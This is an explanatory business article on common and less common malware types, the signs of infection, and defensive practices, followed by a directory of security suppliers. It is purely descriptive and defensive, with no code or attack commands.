The Different Types of Malware

Regardless of how familiar you are with Information Security, you’ve probably come across the term ‘malware’ countless times. From accessing your business-critical resources and sensitive information to halting business operations and services, a malware infection can quickly become an organization’s worst nightmare come true.
 
As a business owner, you must be aware of the implications of different types of malware on your company’s bottom line, and what steps you can take to protect your company from future attacks. This article will walk you through the various types of malware, how to identify and prevent a malware attack, and how to mitigate the risks.
 
What is Malware?
 
Malware, a combination of the terms ‘malicious’ and ‘software,’ includes all malicious programs that intend to exploit computer devices or entire network infrastructures to extract victim’s data, disrupt business operations, or simply, cause chaos. There’s no definitive method or technique that defines malware; any program that harms the computer or system owners and benefits the perpetrators is malware. 
 
A malware usually exploits unpatched software vulnerabilities to compromise an endpoint device and gain a foothold in an organization’s internal network. 
 
It could be hidden in a malicious advertisement, fake email or illegitimate software installation. Cyber criminals often leverage social engineering tactics like phishing and spear-phishing to propagate sophisticated malware. 
From mining crypto currency to launching DDoS attacks against networks, there are countless ways in which malware can access and utilize victim’s computers and data.
 
Warning Signs of Malware Infection
 
How often have you ignored unusual system slowdowns or unexpected pop-up messages? 
Unfortunately, this could be your computer trying to give away the presence of malware. To stop a malware attack in its tracks, you must first be able to identify an infection. 
 
Here are some of the key signs that almost always indicate malware progressing in your computer system:
 
• Your computer starts running slowly and takes forever to boot.
• Your computer screen freezes or the system crashes, displaying the ‘Blue Screen of Death” (BSOD)
• Your web browser keeps redirecting you to unknown, suspicious websites. 
• Security warnings keep popping up, urging you to take immediate action or install a particular security product. 
• Many pop-up ads start appearing randomly.
 
All of these could be typical signs of malware. The more symptoms you see, the more likely it is that you’re dealing with an infected computer. 
 
But don’t just solely rely on the list included above. It is not unusual to have your system or network infected with malware, such as spyware, that often lingers secretly with no apparent symptoms. Don’t worry though. We’ll be discussing how to detect and remove malware silently lurking in your system, exfiltrating sensitive data.
 
Common Types of Malware
 
Malware can be categorized based on how it behaves (adware, spyware and ransomware), and how it propagates from one victim to another (viruses, worms and trojans). For instance, computer worms are self-propagating malicious software, while
trojans need user activation to infect and spread. 
 
Here are a few of the most common malware types that most people have heard of, and how they continue to wreak havoc across industries.
 
1. Adware  If you’re lucky, the only malware program you’ve come in contact with is adware, which attempts to expose the compromised end-user to unwanted, potentially malicious advertising. A common adware program might redirect a user’s browser searches to look-alike web pages that contain other product promotions. Statistics gathered between October and December 2019 by Avast’s Threat Lab experts show that adware was responsible for 72% of all mobile malware, and the remaining 28% consisted of banking trojans, fake apps, lockers, and downloaders.
 
2. Spyware  Spyware can silently infect a computer, mobile device or tablet, trying to collect keystrokes, gather sensitive data, or study user behavior, all the while victims remain entirely unaware of the intrusion. Hackers may use a keylogger to capture sensitive information, including payment details and login credentials of victims, or they may leverage a screen grabber to capture internet activity. A common type of spyware is a RAM scraper that attacks the storage (RAM) of electronic point-of-sale (POS) devices to scrap customers’ credit card information. One of the most notorious one being the BlackPOS spyware that compromised the data of over 40 million Target customers in 2013.
 
3. Ransomware  Ransomware is one of the most widespread cyber threats, making up at least 27% of all malware incidents as per Verizon’s annual DBIR report (2020). Ransomware programs gain access to a computer’s file system and execute a payload to encrypt all data. The data is neither stolen nor manipulated. Shortly after a ransomware attack, cyber criminals will demand a ransom amount, usually in crypto currency, in exchange for the cipher key. WannaCry 2017 is well-known for the stir and panic it caused in May 2017 by affecting thousands of NHS hospitals, delaying critical medical procedures, and rerouting ambulances. The ransomware leveraged a Microsoft exploit, EternalBlue, which already had a patch that many conveniently did not apply. Unfortunately, most of the data it encrypted was lost for good due to faulty code.
 
4. Computer Viruses  A virus is the most commonly known form of malware. It differs from other malware in its ability to attach to a host file and infect other files on the computer system. It copies itself whenever the file is copied, and once a user opens the file, the virus payload is executed. Viruses can be highly destructive, infecting the hard drive on victim’s computers and overwriting or exfiltrating critical information. Email attachments are the top vector leading to virus infections. Computer viruses often utilize deception techniques and keep evolving to evade antivirus software. Viruses like CIH (Chen lng-hau) do not increase the file size of the host file, thus becoming undetectable for antivirus programs that detect viruses based on the file size.
 
5. Computer Worms  A worm is quite similar to a computer virus, except it is a standalone software that does not rely on a host file or a user to propagate itself.  A worm is self-replicating and can quickly spread across computer networks by distributing itself to the victim’s contact list and other devices on the same network. A firewall can be effective in stopping the spread of worms through network endpoints. However, anti malware is required for detecting worms disguised as email attachments. NotPetya shook the entire world in June 2017. It was undisputedly the fastest spreading, most destructive worm that crippled hospitals, multinational companies and pharmaceutical giants globally by irreversibly encrypting systems’ master boot records.
 
6. Trojan Horse  A trojan horse is a malware program that advertises itself as legitimate software and tricks users into downloading and executing it. Once activated, it can harm the victim’s computer in several ways, including keylogging. 
Mostly, it can create a backdoor to bypass firewalls and security software to give remote access to unauthorized users who can steal data and control the computer system. Trojans cannot self-replicate and are often propagated through email attachments and internet downloads. The backdoor trojan, PlugX malware, compromised around 7.93 million customer records from a Japanese travel agency, JTB Corp, in July 2016. And it all started with a single employee falling prey to a phishing email.
 
7. Botnets  A botnet is a network of internet-connected ‘zombie’ computers that can execute coordinated actions after receiving commands from a centralized server.  Bots secretly infect a computer, which then becomes a part of the bot network. They can be used to launch spam emails and distributed denial of service (DDoS) attacks, leveraging hundreds of thousands of compromised computers. Conficker, or Downadup, is a fast-propagating malware discovered in November 2008. Over the years, it has infected millions of computers to create a botnet. Cybercriminals can utilize the botnet to carry out malicious activities, such as phishing, identity theft and bypassing security to access private networks.
 
Less Common Types of Malware
 
In addition to the types discussed above, there are many other types of malware that are less common but equally destructive.
 
1. Rootkit  A rootkit is a collection of software tools that can gain access to an operating system and assume administrative privileges.  It can use the acquired privileges to facilitate other types of malware infecting a computer. Moreover, it can also take over browsing sessions to prevent access to webpages with antimalware programs.
 
2. Fileless Malware  Fileless malware is a malicious code that exploits legitimate software programs and operating system tools to infect a computer’s memory. As the name suggests, it does not need a file system to spread, and therefore, leaves no trace for detection through traditional anti malware programs.
 
3. Scareware Scareware is basically a scam used by attackers to trick victims into thinking that their computers or mobile devices have been compromised.  It typically displays pop-ups on webpages to scare a user into purchasing and installing fake, potentially harmful, security software. Today, bad actors often launch cyber attacks that are a combination of several malware types.  For instance, a worm could quickly self-replicate and deliver an executable to encrypt file systems across computer networks and launch massive ransomware. These hybrid forms of malware are even harder to detect, contain and remove.
 
How to Protect Your Business From Malware
 
The threat landscape is ever-evolving, and so are the security mechanisms. With malware becoming more sophisticated than ever, businesses must stay ahead of the cybersecurity game by ensuring that:
 
 
• All business applications and operating systems are always up-to-date, and available patches for known software vulnerabilities are installed.
• Antimalware scans are run regularly across all devices that access the internal network. 
• Employees only install apps and software that they actually need from legitimate sources. 
• Mobile devices that access the private network are also well-equipped with mobile security solutions.
• Single Sign-on (SSO) and Multi-factor Authentication (MFA) mechanisms are implemented to protect against keylogging.
• In flexible working or bring your own device (BYOD) environments, employees have separate PCs for work and personal use.
• Employees are aware of the cybersecurity best practices, and regular security awareness workshops are conducted. 
• Employees are knowledgeable enough to spot a phishing email and double-check before providing sensitive information. 
• Your organization has invested in Security Information and Event Management (SIEM) software to aggregate and analyze event logs generated by network and apps.
• If you work with an MSP (Managed Service Provider), make sure they are also a Managed IT Security Provider. Certain certifications will help you identify whether or not they can provide a high level of security including, but not limited to:
• Certified Informations Systems Security Professional (CISSP)
• AICPA Service Organization Control Reports SOC 2 Certification
• MSP Alliance Cyber Verify AAA Rated Company
 
How to Get Rid of Malware
 
No single security program is enough for malware that is known to morph and evolve rapidly to avoid detection.  With today’s virtually endless endpoint devices and huge attack surface, security incidents are inevitable.  A reputable enterprise anti malware program can detect an installed malware, quarantine the infected device to avoid transmission, and remove the malware.  But let’s not forget that preventing a malware infection altogether is much easier than getting rid of it once it has infiltrated your IT infrastructure. The best course of action is to adopt a proactive approach to cybersecurity. 
 
Ashley Lukeheart is Co-founder Parachute Technology 
 
You Might Also Read:
 
Most Large Financial Firms Have Been Attacked In The Past Year:
 
« The Impact of Covid-19 On Cyber Security Threats
The SolarWinds Hack Can Directly Affect Industrial Control Systems »

CyberSecurity Jobsite
Perimeter 81

Directory of Suppliers

ManageEngine

ManageEngine

As the IT management division of Zoho Corporation, ManageEngine prioritizes flexible solutions that work for all businesses, regardless of size or budget.

The PC Support Group

The PC Support Group

A partnership with The PC Support Group delivers improved productivity, reduced costs and protects your business through exceptional IT, telecoms and cybersecurity services.

Resecurity

Resecurity

Resecurity is a cybersecurity company that delivers a unified platform for endpoint protection, risk management, and cyber threat intelligence.

MIRACL

MIRACL

MIRACL provides the world’s only single step Multi-Factor Authentication (MFA) which can replace passwords on 100% of mobiles, desktops or even Smart TVs.

LockLizard

LockLizard

Locklizard provides PDF DRM software that protects PDF documents from unauthorized access and misuse. Share and sell documents securely - prevent document leakage, sharing and piracy.

The Networking People (TNP)

The Networking People (TNP)

TNP supplies independent advice allowing large organisations to design, build and operate their own networks independently of the established telecoms companies.

European Internet Forum (EIF)

European Internet Forum (EIF)

EIF’s mission is to help provide European political leadership for the political, economic and social challenges of the worldwide digital transformation.

Exatel

Exatel

Exatel is Poland’s leading provider of ICT security services.

Abion

Abion

At Abion (formerly BRANDIT), we empower your business by providing comprehensive brand protection and web security services.

CyberMDX

CyberMDX

CyberMDX delivers proactive security built for hospital devices. 360° visibility, insight, and protection for all connected hospital technologies.

GroupSense

GroupSense

GroupSense helps governments and enterprises take control of digital risk with cyber reconnaissance, counterintelligence and monitoring for breached credentials.

DigiSec360

DigiSec360

DigiSec360 is a technology firm focused on the human element of cybersecurity.

Loki Labs

Loki Labs

Loki Labs provides expert cyber security solutions and services, including vulnerability assessments & penetration testing, emergency incident response, and managed security.

CloudSphere

CloudSphere

CloudSphere’s flagship Cloud Governance Platform enables enterprises and cloud service providers to simplify and optimize cloud migration, management, and governance.

SubCom

SubCom

How Much Do You Trust Your Endpoint? With our ‘Habituation Neural Fabric’ based endpoint security platform, you can observe and manage the Trust Score of your endpoints in real-time.

Block Harbor Cybersecurity

Block Harbor Cybersecurity

Block Harbor has worked closely with automakers, suppliers, and regulators since 2014 on vehicle cybersecurity.

Kivera

Kivera

Kivera enforces your organisation governance and security policies across cloud deployments preventing misconfigurations turning into attack vectors.

Robust Intelligence

Robust Intelligence

Robust Intelligence enables enterprises to secure their AI transformation with an automated solution to protect against security and safety threats.

EGUARDIAN

EGUARDIAN

EGUARDIAN serves as a Value-Added Distributor and technology enabler in the APAC region with the aim of further expanding globally and cater to the needs of the demands with the emerging technology.

Couno

Couno

Couno is a trusted provider of IT support services throughout the UK and Europe.

Layer 8 Security

Layer 8 Security

Layer 8 Security is a cybersecurity advisory, consulting, and technical services firm that arms businesses with practical compliance, risk management, and security program strategies.